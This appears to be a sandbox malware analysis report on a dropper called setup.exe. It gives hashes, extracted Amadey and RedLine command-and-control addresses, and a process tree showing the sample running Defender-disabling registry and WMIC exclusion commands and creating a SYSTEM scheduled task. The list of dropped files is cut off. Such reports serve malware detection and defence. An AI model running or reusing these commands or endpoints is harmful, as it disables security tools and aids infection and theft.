Analysis
-
max time kernel
50s -
max time network
155s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
-
submitted
20-06-2024 13:37
General
-
Target
setup.exe
-
Size
1.8MB
-
MD5
20fe52f3ba934b9b7454c194f44d74d0
-
SHA1
f38c3041926f329dac459bacce67850dc58ab15a
-
SHA256
3dca9b74c06babae491aef6495a256d6d26a4539cdc680b64ea4e0daee9cf603
-
SHA512
de74eaa8fcd2dc40da40f09e4c69f41c63282c1d70f352fe3e6f0b7ef70318f5252e520574d428f1bd5c24dc6d55acab9f109b6a6c36718df1f9ead25effccfc
-
SSDEEP
24576:1/JK2aIjA7qco3fFT9eSzR160c8LE8x+dyh9tfzHEBZ/QJc0erHIuoDaFtTNihZi:VlfA7kvFJRPpAC+UdTmtQCtouortLka
Malware Config
Extracted
amadey
4.21
0e6740
http://147.45.47.155
-
install_dir
9217037dc9
-
install_file
explortu.exe
-
strings_key
8e894a8a4a3d0da8924003a561cfb244
-
url_paths
/ku4Nor9/index.php
Extracted
amadey
8254624243
e76b71
http://77.91.77.81
-
install_dir
8254624243
-
install_file
axplong.exe
-
strings_key
90049e51fabf09df0d6748e0b271922e
-
url_paths
/Kiru9gu/index.php
Extracted
redline
newbild
185.215.113.67:40960
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Detects Monster Stealer. 2 IoCs
-
Monster
Monster is a Golang stealer that was discovered in 2024.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
-
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 9 IoCs
-
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 10 IoCs
-
Themida packer 3 IoCs
Detects Themida, an advanced Windows software protection system.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Windows directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious use of AdjustPrivilegeToken 20 IoCs
-
Suspicious use of FindShellTrayWindow 40 IoCs
-
Suspicious use of SendNotifyMessage 36 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\1000015002\1c18ccbc16.exe"C:\Users\Admin\1000015002\1c18ccbc16.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe"C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe"5⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\onefile_704_133633642778774000\stub.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe"6⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe"C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 526⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000025001\deep.exe"C:\Users\Admin\AppData\Local\Temp\1000025001\deep.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\da_protected.exe"C:\Users\Admin\AppData\Local\Temp\da_protected.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\ipqmqz.exe"C:\Users\Admin\AppData\Local\Temp\ipqmqz.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\setup.exesetup.exe8⤵
-
C:\Users\Admin\AppData\Local\Temp\setup-d30c944dc29d024d\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup-d30c944dc29d024d\setup.exe"9⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 846⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe"C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe"5⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\1000005001\setup.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\setup.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSB9ED.tmp\Install.exe.\Install.exe8⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC0A1.tmp\Install.exe.\Install.exe /dLVdidXYccg "385119" /S9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"10⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 612⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 613⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 612⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 613⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 612⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 613⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 612⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 613⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force12⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force13⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force14⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True12⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True13⤵
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bRfJDuKmNsszhfPRJj" /SC once /ST 13:40:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF\KNGeknwcwbxZLbh\iNDXUaF.exe\" oU /lrJdidvy 385119 /S" /V1 /F10⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe"C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\onefile_3240_133633643244322000\stub.exe"C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe"6⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe"C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3564 -s 646⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000082001\quickaccesspopup.exe"C:\Users\Admin\AppData\Local\Temp\1000082001\quickaccesspopup.exe"5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000016001\c8b416efe7.exe"C:\Users\Admin\AppData\Local\Temp\1000016001\c8b416efe7.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\1000017001\346224a2d5.exe"C:\Users\Admin\AppData\Local\Temp\1000017001\346224a2d5.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef74f9758,0x7fef74f9768,0x7fef74f97785⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1192 --field-trial-handle=1308,i,14620901429604422801,16927117530615268654,131072 /prefetch:25⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1516 --field-trial-handle=1308,i,14620901429604422801,16927117530615268654,131072 /prefetch:85⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1556 --field-trial-handle=1308,i,14620901429604422801,16927117530615268654,131072 /prefetch:85⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2344 --field-trial-handle=1308,i,14620901429604422801,16927117530615268654,131072 /prefetch:15⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2352 --field-trial-handle=1308,i,14620901429604422801,16927117530615268654,131072 /prefetch:15⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1316 --field-trial-handle=1308,i,14620901429604422801,16927117530615268654,131072 /prefetch:25⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1380 --field-trial-handle=1308,i,14620901429604422801,16927117530615268654,131072 /prefetch:15⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2472 --field-trial-handle=1308,i,14620901429604422801,16927117530615268654,131072 /prefetch:15⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2488 --field-trial-handle=1308,i,14620901429604422801,16927117530615268654,131072 /prefetch:85⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3780 --field-trial-handle=1308,i,14620901429604422801,16927117530615268654,131072 /prefetch:85⤵
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.8MB
MD51259eee53eae1fc7b96f6dfeb18c47d7
SHA13849b890056b61c8582d23bf9fa5567a9bde4206
SHA256c09519f94e2e17b649a57f01fb0d0f69608fc897e8242ba9b43cab1f5fa2f304
SHA512ee8fb6435a01f3348fb9898cfa856552e3ddf2a4dcb267505b15f1d00129b8f63eab2b516ada4220e79adbfb10b139f4b44c2e456a514860dfe6944c7e0ef900
-
Filesize
342B
MD50a15fe15b1a23956f83a3a51eed4cb50
SHA1971ea6a5fb9782d401cf063b78a310d476fa002e
SHA256fac5b67912f6a2525df9d148bc5ef89d79c5d41f0cbaceb33098f0f18c7daa57
SHA5126ee20fe7d3d5a30523bcb55d1356ccdcf866a41e997ae72c29ec9e70dd21fd2c0207b4b492f90281d67a18f7128c01e7fae9a9f4f6f6459a8528edcf5ae90f67
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
1KB
MD5f57dee866d22b4b3502044a44af1994c
SHA1658d23cbd0746bdfa24c12dcf3607eb575d6e3bd
SHA256e33c7e1f10c8b8543753a46a0476543776ee132ee7c897448f717de070485d82
SHA512661f112e82d874f88d4e3ded2ad13531cdcc20ee54833deecceaa857e4fc228ecf74b9c639c9e4ffb74de557acd56d3e3359cbb1a974f189b4ca3f93ad64c2f9
-
Filesize
527B
MD5bad344e2e62f2bc619802924eec7b9b0
SHA12e3bd8c71790dab14787458777cb67e2c07d7123
SHA2565202aaa14f835299e8e7b252fb29db8357c06e0ce5035b87d2be94456a65af7b
SHA512849e7d999fa23633f8dfccdca123e132efe2f76f818abae938504c54932a486e57bb60fdae4f25ff46ea190821b4f73c311f9ac42adafa1e4abea6f7d8c5d321
-
Filesize
5KB
MD5b5aae788d16f9ed51c7a7d79828b8ae8
SHA14f31176eae515ee4bff2a009675e31d2b41eaad9
SHA2569649cbb2e0935ddacb3d728e3a3d632a04f3e8e6519016ef27ea3ce953059771
SHA512b5b6dd1d1707d595df77d5ca40ab5ebec5270fd43984a174db30ea93b3eae299257cb3dd38177bf535808b28fc01745eb7ffafa928ef8be48ad8cf3cd364b085
-
Filesize
16B
MD518e723571b00fb1694a3bad6c78e4054
SHA1afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA2568af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA51243bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2
-
Filesize
5KB
MD554aef43a4487c5500b1d9058a67ec9c2
SHA1c1b7ab0ec12ac34686f35fbf96a3aa20e619e1e5
SHA2563608610f58e96e6fc70d675f7e86c25074a7a3a5478c7c5960a72039c451eb12
SHA512d684b20f778b9c72c2e10e75a4f8ed951a9a7aaf3fb6b5c6090013d9a0fc084574ba6de7caad5b784952362f6c6b64d3eea62984e6b8ec1adaf57e32450b2555
-
Filesize
10.7MB
MD5c09ff1273b09cb1f9c7698ed147bf22e
SHA15634aec5671c4fd565694aa12cd3bf11758675d2
SHA256bf8ce6bb537881386facfe6c1f9003812b985cbc4b9e9addd39e102449868d92
SHA512e8f19b432dc3be9a6138d6a2f79521599087466d1c55a49d73600c876508ab307a6e65694e0effb5b705fdecdd0e201f588c8d5c3767fe9ae0b8581c318cadac
-
Filesize
7.2MB
MD50850f07e1044e86346059ca8bf1e083b
SHA1a378ed0369b6d733c6eeb1788448bcac49fc2a37
SHA25684055de8627e39294ccd88d8478135facf4a3bef00b1703d80c05d495a9dde34
SHA512503e3c8b34a5ce3b0024fbd174282446bb2a252526066033e243a65436f78a6c54e9d5cb9084b7f8b8eb8b44a0a3dd4f1b4f60896185a02980fd4143632fa5dd
-
Filesize
297KB
MD50efd5136528869a8ea1a37c5059d706e
SHA13593bec29dbfd333a5a3a4ad2485a94982bbf713
SHA2567c21c1f3063ba963818542036a50f62ac7494ad422e7088897b55c61306ec74e
SHA5124ac391812634107e4a4318c454a19e7c34abfc1f97acc9bcd0fac9a92c372e5ebfe809e5c433479142537762ed633564bc690b38fc268b169498d6a54249e3fe
-
Filesize
1.7MB
MD5e8a7d0c6dedce0d4a403908a29273d43
SHA18289c35dabaee32f61c74de6a4e8308dc98eb075
SHA256672f24842aeb72d7bd8d64e78aaba5f3a953409ce21cfe97d3a80e7ef67f232a
SHA512c8bf2f42f7bcf6f6b752ba5165c57ee99d4b31d5ba48ce1c2651afdb8bc37a14f392253f3daa0e811116d11d4c9175dc55cfb1baac0c30a71a18e1df17e73770
-
Filesize
2.4MB
MD5ca515d624d046e04a75136ab4e44d2d6
SHA138386388904193c8e3fdc127c84e01b0900151a9
SHA2569563f375fa92fc677e28774948c2dc3da57b1c00c5fc9323f32fdbbe615a1579
SHA512d0fededa96fee657c9a209f7c66c7c2d3a51b5b1339312f5a3e409e53d5244a8ab43cde6a5df94022f9a9839297c4abe3a1794d319e04a1611c83eb70070ee9a
-
Filesize
2.3MB
MD569a4a65b5ec85ea408be9cd4cd98302b
SHA10018d4efea874bc4cc82ed0913a8e92b106d9760
SHA2564012c033d90c0145f80b0bdfc10972fb5af52704e99ed63a3116930668762695
SHA512b019f1739b194e9251c631fdabe414592f1bd2a8056c8abd14ffc2506660dfa256c39f477880fc29bd21355de15033653a96fb6b6e3921d3573b2cb208a315a3
-
Filesize
3.6MB
MD5864d1a4e41a56c8f2e7e7eec89a47638
SHA11f2cb906b92a945c7346c7139c7722230005c394
SHA2561c733ad7ed4f89826d675196abcc3a6133bb8f67c69d56e5fcb601ad521ff9f8
SHA512547a441369636e2548c7f8f94c3972269e04d80ee5a26803cc222942b28e457be908126fb4ff6bfde2a063ea1ef74ecba2aaceb58c68fba5c4fddcea5fbd91d3
-
Filesize
522KB
MD570a578f7f58456e475facd69469cf20a
SHA183e147e7ba01fa074b2f046b65978f838f7b1e8e
SHA2565c8d556e39269b22e63ba9c941ff306bb043bc35125ba08787617577231b381a
SHA512707ed48b45978d26faaf3544bf22912461503d6e4b1a077cbb7c3a8abd2f1eb3fec16b2786a79ae4db2dfec92f662ece1998bc142706d2b482599fb6191563c0
-
Filesize
310KB
MD56e3d83935c7a0810f75dfa9badc3f199
SHA19f7d7c0ea662bcdca9b0cda928dc339f06ef0730
SHA256dc4f0a8e3d12c98eac09a42bd976579ccc1851056d9de447495e8be7519760ed
SHA5129f6b22bc9d0306a69d3c5bab83c7603fa23925c12089f9608772602ab2c4c0908cda2a3d9592fc0fab4aaff209ef41d3e2a931511ce9dfd027691e8dce9ad9b9
-
Filesize
3.6MB
MD5c28a2d0a008788b49690b333d501e3f3
SHA16a25fdb8613db00b09d4d6e1ad302c20c7f7e2c4
SHA256f61712dccccf8f19c6dbf0dfb7c7c0be9eb2f13d3381ee94e4cb6cb70ffb5f5a
SHA512455923a63e60b6079d7e0af2bfae5f922b205d024def456ae95158ef1bfcdbc4f56e24b4421a2203f4618d0ea29e229e331c7ee0d7881ee8ebac83fa72f5d788
-
Filesize
415KB
MD507101cac5b9477ba636cd8ca7b9932cb
SHA159ea7fd9ae6ded8c1b7240a4bf9399b4eb3849f1
SHA256488385cd54d14790b03fa7c7dc997ebea3f7b2a8499e5927eb437a3791102a77
SHA51202240ff51a74966bc31cfcc901105096eb871f588efaa9be1a829b4ee6f245bd9dca37be7e2946ba6315feea75c3dce5f490847250e62081445cd25b0f406887
-
Filesize
10.7MB
MD53f4f5c57433724a32b7498b6a2c91bf0
SHA104757ff666e1afa31679dd6bed4ed3af671332a3
SHA2560608a7559f895fab33ae65bbfbdc5bebd21eea984f76e1b5571c80906824d665
SHA512cf572ca616b4f4e6e472e33e8d6d90b85d5885fa64d8bca4507450d66d65057efa771f58c31ea13f394fd0e7b0ff2fcaa9d54c61f28b27b98a79c27bc964f935
-
Filesize
659KB
MD5bbd06263062b2c536b5caacdd5f81b76
SHA1c38352c1c08fb0fa5e67a079998ef30ebc962089
